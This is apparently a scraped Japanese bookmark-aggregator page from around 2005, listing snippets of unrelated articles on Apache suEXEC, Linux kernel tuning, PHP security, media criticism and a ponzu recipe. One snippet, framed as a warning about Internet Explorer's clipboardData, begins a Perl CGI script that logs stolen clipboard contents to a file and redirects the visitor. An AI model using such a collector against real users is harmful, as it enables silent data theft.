Apache 2.0でsuEXECを使う
通常、ApacheにおいてCGIプログラムなどは、コンテンツのユーザーとは関係なく、すべて同じApacheの実行ユーザー(デフォルトではnobody)の権限で実行されます。例えば、CGIプログラムからアクセスされるデータファイルはnobodyがアクセスできるような権限設定がされていなければりません。しかし、このような権限設定がされたファイルは、CGIを経由してすべてのユーザーによってアクセス可能になってしまいます。つまり、別のユーザーによってファイルを閲覧されたり、破壊されたりする恐れがあるのです。suEXECは、CGIプログラムなどをApacheの実行ユーザー権限ではなく、それぞれのコンテンツユーザーの権限で実行するためのApacheのモジュールです。 インストール suEXECはApacheに標準でバンドルされています。しかし、デフォルトのインストールではこの機能は有効になっていません
suEXEC サポート - Apache HTTP サーバ
suEXEC 機能により、Apache ユーザは Web サーバを実行しているユーザ ID とは 異なるユーザ ID で CGI プログラムや SSI プログラムを実行することができます。CGI プログラムまたは SSI プログラムを実行する場合、通常は web サーバと同じユーザで実行されます。 適切に使用すると、この機能によりユーザが個別の CGI や SSI プログラムを開発し実行することで生じるセキュリティ上の危険を、 かなり減らすことができます。しかし、suEXEC の設定が不適切だと、 多くの問題が生じ、あなたのコンピュータに新しいセキュリティホールを 作ってしまう可能性があります。あなたが setuid root されたプログラムと、それらから生じるセキュリティ上の問題の管理に 詳しくないようなら、suEXEC の使用を検討しないように強く推奨します。 始める前に この文書の
大規模サイトのLinuxカーネルチューニング
大規模サイトの為のLinuxカーネルチューニング (Linux kernel tuning for large site) 文責: もりかわひろかず * ** 大規模なサービスを行うサーバOSとしておこなうべき チューニングの定石について記述します kernelのバージョンは2.4.31を対象にしています (もう2.6でしょう) (2.4版のメンテやめます) OSのデフォルト設定は一般的な規模を想定しています それを逸脱するような大規模な用途(大規模なwebサーバ、 web cache(squid)サーバ、バーチャルドメインサーバ[仮想サーバ])に使用するには、 やはりそれなりのチューニングが必要になってきます 以下で、そのチューニングの定石を列挙します (なぜチューニングが必要なのか) (個々の値については各サイトで調節してください) (以下のパラメータは I
@IT:/procによるLinuxチューニング [後編]
の4つがあります。kernel配下にはカーネル全般にかかわるパラメータ、fs配下にはファイルシステム関連のパラメータ、vm配下には仮想記憶関連のパラメータ、net配下にはネットワーク関連のパラメータが置かれています。 /proc/sys/kernelディレクトリ まずはkernel配下のパラメータを見ていきましょう。/proc/sys/kernel配下のパラメータを使うと、パフォーマンス・チューニング以外のさまざまな設定も可能です。 ctrl-alt-del、cad_pid ctrl-alt-delは、おなじみの[Ctrl]+[Alt]+[Del]キーシーケンスの有効(1)/無効(0)を設定するファイルです。同時に、cad_pidには[Ctrl]+[Alt]+[Del]キーを押した際にシグナルを送信するプロセスを指定します(注)。 domainname、hostname これらのファイルに
@IT:/procによるLinuxチューニング [前編](1/2)
/procによるLinuxチューニング [前編] ~ /procで理解するOSの状態 ~ Linuxの状態確認や挙動の変更で重要な役割を担うのが/procファイルシステムである。前編では/procの概念や/procを利用したOSの状態確認方法を理解していただきたい。(編集局) 遠田 耕平 2002/12/10 本稿では、/procファイルシステムによるカーネルチューニングを紹介します。カーネル2.4.19をベースに説明していきますが、カーネルのバージョンによって内容が異なる場合があります。また、ディストリビュータが独自の拡張を施しているものもあります。従って、これから説明する内容がすべて当てはまるとは限りません(端的にいうと説明の対象が存在しなかったり、説明されていない機能が追加されていることがあります)。 /procファイルシステムとは /procは、Linuxシステムの/(ルート)に「
人工無脳レビュー
Fig. 1に最近の人工無脳の能力の、独断に基づいた分布を示す。横軸は学習能力、縦軸は文脈追跡能力を示している。近年この勢力図は大きく変わった。マルコフ文生成を行なう人工無脳の一派の台頭と、限定的ながら論理を追跡して会話に反映させる人工無脳の技術の出現である。かつて人工無脳の代名詞と考えられていた辞書型はいまや旧世代のアーキテクチャに属し、その範疇では新しい技術開発が停滞している模様である。ログ型アーキテクチャは以前から存在していたのだが、いつの時代にもあまり大きな勢力にはなっていないようである。これらの情勢の変化はマシンパワーの増大と人工無脳業界への形態素解析器の導入に伴って生じたと考えられる。以下に各人工無脳の特徴を簡単に述べる マルコフ文生成型 マルコフ連鎖を用いて文を生成する。後述の辞書型人工無脳は辞書を拡大することでよい反応をするようになるが、マルコフ文生成型は逆で、生成する文の
ポン酢の作り方・レシピ|鰹節 伏高
お手製の「ポン酢」を作りませんか 鍋物には付き物の「ポン酢」、皆様のご家庭ではどうしてらっしゃいますか? 私が子供の頃、我が家の「ポン酢」は、食べるときに自分で柑橘果汁(いわゆる「ポン酢」と云う名称で市販されている味のついていないタイプです)に醤油を混ぜて作っておりました。 一口に言うと「塩っぱくて」て「酸っぱい」だけの「ポン酢」でした。 たまの外食で鍋を食べると、そのお料理屋さんの「ポン酢」は旨いのなんの。 我が家の「ポン酢」とは大違いです。 「なんで家のは酸っぱいだけなんだろう?」 「食べ物屋さんのはどうやって作っているのだろう?」 と、子供のくせにずっと疑問をもっておりました。 数年前、どうしても「あの食べ物屋さんのおいしいポン酢」を自分で作りたくなりました。 聞くは一時の恥とばかり、お客さん(板前さん)何人かに聞きました。 例によって、十人十色の作り方でございましたが、シンプルで旨
薬学用語辞典
*このページはすべて個人で作成したものです。いかなる団体、組織とも関係ありません。(私個人の学習ノートです。) 3005項目収録 *「戻る」の設定をしていませんので、ブラウザの"← →"で操作して下さい。 a,b,c,d,e,f,g,h,i, j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z ア イ、ウ、エ、オ カ キ、ク、ケ、コ サ シ、ス、セ、ソ タ チ、ツ、テ、ト ナ ニ、ヌ、ネ、ノ ハ ヒ、フ、ヘ、ホ マ、ミ、ム、メ、モ ヤユヨ ラ リ、ル、レ、ロ ワ 分類別索引へ A,B,C索引へ
gigigi SNS : 「はだしのゲン」ソーシャル・ネットワーキングサイト
このウェブサイトは販売用です! atpne.jp は、あなたがお探しの情報の全ての最新かつ最適なソースです。一般トピックからここから検索できる内容は、atpne.jpが全てとなります。あなたがお探しの内容が見つかることを願っています!
『子供が惨殺されると嬉々とするマスコミ』
筑紫哲也のNEWS23で「ブログと報道」をテーマに鳥越俊太郎氏と時事通信の記者呼んで特集組んでた。 独自米国ギャラップ社のアンケートで75%の人が新聞・テレビの報道を信頼していると権威付けして「最近ブログが調子に乗ってるけど、マスコミは必要なんだ」みたいな事をウダウダ言ってた。変なサブリミナルみたいな映像が流れ、911同時多発テロが引鉄となった愛国心の高まりを引き合いに出してブログは右傾化しやすいとかダンラザーが捏造報道でblogから糾弾されるさまはまるで集団リンチだったとか、全編に渡る印象操作はさすがNEWS23のお家芸。いちいち突っ込むのもアホらしいが、特に印象に残ったは筑紫氏の(2005/11/26 2:34訂正 下記の発言は筑紫氏ではなく米ABCテレビのテッドコッペル氏でした。お詫びして訂正します) 「マスコミは実名発言だがブログは匿名発言、だから背後にある特定団体の影響などがわか
テレビ報道もヒューザー社長を朝から怒鳴った「みのもんた」もちょっとねえ。 : 大西 宏のマーケティング・エッセンス
2005年11月24日14:57 テレビ報道もヒューザー社長を朝から怒鳴った「みのもんた」もちょっとねえ。 カテゴリマスコミ kinkiboy Comment(20)Trackback(31) おかしい。なにか強度計算偽造事件報道はママスコミの報道というかTVの報道がおかしい。木村建設が雲隠れし、今は、建築主のヒューザの小嶋社長が、積極的にマスコミにも登場するようになったということもあり、この事件の主犯としてヒューザーのバッシングがはじまりました。 今朝も、みのもんたが、ヒューザーの小嶋社長を、大声で一方的にまくしたてていましたが、(ほんとうはみのもんたの勘違いだと思えましまたが)みのもんたに限らず、きっと建築主のヒューザが構造計算の改ざんを指示、強要したという裏を取っての報道なのでしょうね。それ以外は考えられない報道の姿勢です。事件としては、悪徳業者としてヒューザーを血祭りに上げるほうが
なぜSSL利用をケチるのか
Eメールから,真正なサイトになりすましたWebサイトに誘導し,IDやパスワードなどの情報を盗み取るのがフィッシングだ。フィッシングによる金銭的な被害は,国内でも2004年9月には発生している(関連記事)。それから1年以上が経つ。Webサイトにとって基本的なフィッシング対策の一つは,SSLをログイン画面から使うこと。しかし,この基本対策をなおざりにしているWebサイトがまだ多い。 SSLならアクセス先を確認できる 一見,暗号化のためのSSLとフィッシング対策とは,関係ないようにも思える。でも実は,SSLには暗号化のほかに,電子証明書で身元を証明するという機能も備わっている。Internet ExplorerなどのWebブラウザで,SSLを使用していることを示す鍵(かぎ)マークをクリックすると,電子証明書が表示される。利用者が意識してこの証明書を確認すれば,アクセス先がどこであるかが判別できる
prototype.js v1.5.0 の使い方
それは何? prototype.js は Sam Stephenson によって書かれた JavaScript ライブラリです。 この熟考の上記述された標準に準拠したコードは、Web 2.0 において特徴となるリッチでインタラクティブなウェブページを制作する際の重荷を、あなたの肩から取り去ってくれるでしょう。 もしこのライブラリを使ったことがあるなら、充実したドキュメントがこのライブラリの売りではないことに気がついたはずです。 私は他の開発者と同様に、ソースコードを読み、試行錯誤しながら prototype.js を理解しました。 自分が学んでいる間にメモを取り、それを他の人たちと共有することは価値があるのでは、と考えたのです。 加えて、このライブラリによって提供されているオブジェクト、クラス、関数、拡張機能についての 非公式リファレンス も提供しています。 ここで提供する例とリファレンス
PHPのセキュリティを確保する - SourceForge.JP Magazine
PHPは世界中の数百万台のサーバ上で動的なWebサイトの作成に使用されている人気の高いスクリプト言語である。サーバで動的ページを生成することは、ユーザにサーバ上のコマンドやファイルやネットワーク接続へのアクセスを与えることを意味し、潜在的に多数のセキュリティリスクを生じる可能性を伴う。そのようなリスクはサーバの設定を適切に行うことで大幅に低減できるが、プログラマは作成するスクリプトについても責任を持ってそのセキュリティの万全を期すべきだ。 Apacheのインストールについては以前の記事で取り上げた。今回の記事では、そのApacheのセットアップにPHPを加えるために必要な追加的手順を説明し、続いて、PHPをサーバ上で安全に実行する方法について論じる。 インストール方法の選択 PHPのインストールでは、サーバ上のCGIインタプリタとしてインストールする方法と、Apacheモジュールとして
セキュリティ・プロトコルの実装に脆弱性,複数ベンダーのVPN製品が影響 - セキュリティホール memo
》 産廃業者に漏えい 千葉市2職員を書類送検 (毎日, 11/30) 》 関電社員が5人分 金融業者の依頼受け (毎日, 11/30) 》 年末年始のお問合わせ窓口について (シマンテック) 》 Black Hat 2005 Multimedia Archives (blackhat.com)。Black Hat Japan 2005 もあります。 》 『無買デー』運動の創始者にインタビュー (WIRED NEWS, 11/23) 無買デー関連で、サンタクロースについて Sugihara さんから (ありがとうございます): コカ・コーラのページの「サンタクロースとは」にも解説があります。 http://www.cocacola.co.jp/corporate/gallery/santa/ Flash 多用のページですが、「ミュージアム」の「Art Gallery」の「Coca-Cola
高木浩光@自宅の日記 - 攻撃者視点ではなく開発者視点での解説を
■ 攻撃者視点ではなく開発者視点での解説を 8月に@ITに「機密情報に合法的に近づけるWebアプリケーションを守れ」という記事が 出ていた。 タイトルからして意味がわからない。「合法的に近づける」とは何だ? 英文 の直訳か何かか? その連載第2回「多様化するWebアプリケーションへの攻撃」が今日掲載されたのだが、問題を正しく理解し ないまま書かれた記事と言わざるを得ない。例えば次のように書かれている。 この例では、「userid=-20298745283」がクエリストリング にあたる。クエリストリングはURL内に含まれているため、誰でも見ることが できる。従って、ユーザーのちょっとした出来心やいたずら(例えば 「この数字の最後を1つだけずらせばどうなるかなー?」) によって、脆弱性が露見することも多い。 この例であれば、誰が見ても明らかなように、「userid」のパラメー タがユーザー管理
「きっこのブログ」を情報源にするの禁止な! - ARTIFACT@はてブロ
きっこのブログ: 本当の黒幕は? http://kikko.cocolog-nifty.com/kikko/2005/11/post_a92c.html それは、ついに、ヒューザーの営業マンからの内部告発のメールが届いちゃったからだ。 まーた、この人は…。この人のところは大きな事件があるたびにタレコミやら関係者の話が載るのだが、何の裏もない。裏のないことが多い。 ※表現を訂正しました ARTIFACT ―人工事実― | 「きっこの日記」がイーホームズで取り上げられる http://artifact-jp.com/mt/archives/200512/kikkoehomes.html 反小泉ということで、同じ主張を持つ人がよく取り上げるのを見かけるが、こういう胡散臭いサイトを情報源として取り上げるのは、サイトの信頼度を下げる行為だ。 ※補足 きっこのブログのパターンは、週刊誌などからネタを持
2005年11月21日の日記 - 氾濫原
洗濯機ってエスで lavmaŝin/o なんだってさ。洗うが lav/i ですよ。ラヴィ! やっぱこう、洗濯機パワーをひしひしと感じる。 トップ language knabino de lavmaŝino トップ thinking knabino de lavmaŝino だいたい決まった構造の HTML を書くようになってきたので、俺の場合を紹介してみる。body 以下を書く。 body (div#all) h1#top a div.section#navigation h2 (p#skip-to-main-content) a map ul li#navigation-home a 以下似たようなのが続く div.section#content div.section h2 内容 以下似たような(ry div.section#footer address おおむね上のような感じ。ってい
あなたのクリップボードが盗まれる - Ceekz Logs
IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操作ができるのだ。clipboardData というオブジェクトね。操作できる内容は、クリップボードにデータを読み込むこと(setData)、読み出すこと(getData)、消去すること(clearData)の3種類。 読み出すことも可能なんですよね。しかも、デフォルトでは、警告すら出ない。 以下のような、プログラムを準備しよう。 #!/usr/bin/perl use strict; my $file = '/tmp/cb.txt'; open (CB, ">> $file"); print CB "$ENV{'QUERY_STRING'}\n"; close (CB); print "Status: 301 Moved Permanently\n"; print "Location:
素晴らしき世界の非武装国家〜追記あり - ニッポンのこれから
とほほブログという平和主義者のblogがあります。その中の「民主主義と外国人参政権(1)」を読んでいたら、何だか掲示板に誘導されました。 そこに突っ込み甲斐のある文章が投稿されていたんで紹介します。 〜引用開始〜 非武装・非軍事化を次のように定義した場合。 『憲法において軍隊の不保持を規定している』 『同じく平時には軍隊を保有しないと規定している』 『警察を置いているが軍隊についてなんら規定していない例』 『実際の制度上、警察・税関・国境警備隊と軍隊を区別』 『現実に武器や兵隊を保持していない』 こうしたことを基準にした場合、非武装国家は現在の主権国家数の15%。 アンドラ、コスタリカ、ルクセンブルグ、モルディブ、サンマリノ、リヒテンシュタイン、アイスランド、セントクリストファー・ネイヴィス、ドミニカ、グレナダ、セントルシア、セントヴィンセント・グレナディーン、パナパ、モーリシャス、パラオ
スポンサーサイト::
Home Log RSS 事件報道のリソースに「恣意的な映像」を加えていたマスコミ、それを黙認するマスコミ。 Home > 2008-10 / > This Entry 2005-11 / マスコミ関係 > This Entry [com : 30][Tb : 20] 2005-11-21 <筆者注> 今回のエントリは、あくまでも犯罪報道の影で生み出された「恣意的な映像」というものに焦点を当てて論を進めます。犯罪加害者擁護というつもりは全くないので、その辺りを誤読しないようにお願いします。 「格闘する読売ウイークリー編集部」のブログに、このような記述が掲載されていた ↓ ■いったいどうなっているのか(格闘する読売ウイークリー編集部)(googleキャッシュ)(スナップショット) (筆者注:批評のための資料のという位置付けで、全ての文章を引用) 女子高生がタリウムを母
複数の PHP をインストールし、切り替えて使う方法 - Sooey
複数の PHP をインストールし、切り替えて使う方法 lighttpd 1.4.7 を Mac OS X 10.4.3 にインストール や PHP 5.1.0RC5 Release で書いたように、メインマシンである PowerBook では PHP や ruby、lighttpd といったソフトは複数バージョンを共存できるよう configure に prefix を指定してインストールしています。 従って、例えば PowerBook の /usr/local/php は以下のようになっています。 $ ls -l /usr/local/php total 8 lrwxr-xr-x 1 root wheel 27 11 18 03:38 current -> /usr/local/php/php-5.1.0rc5 drwxr-xr-x 7 root wheel 238 11 15 14:4
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Amazon.co.jp: Linuxパフォーマンスチューニング: Jason R.Fink, Matthew D.Sherer: 本
Radar - O’Reilly
http://www.machu.jp/posts/20050831/p01/
http://d.hatena.ne.jp/Nayuta/20050810
http://www.lost-season.jp/mt/2005/11/2005112322.html
新しいパソコンにiTunesを移動させる方法
ModSecurity (mod_security) - Open Source Web Application Firewall
ブラウザ のキャッシュを制御する/no-cache
「PowerEdge 800、SATA、fedora3の構成でディスクドライブが認識できません」(1) Linux Square - @IT
http://d.hatena.ne.jp/yama_r/20051123/1132741053
ラーメン特集2019-2020 - Yahoo!特別企画
javaworld.jp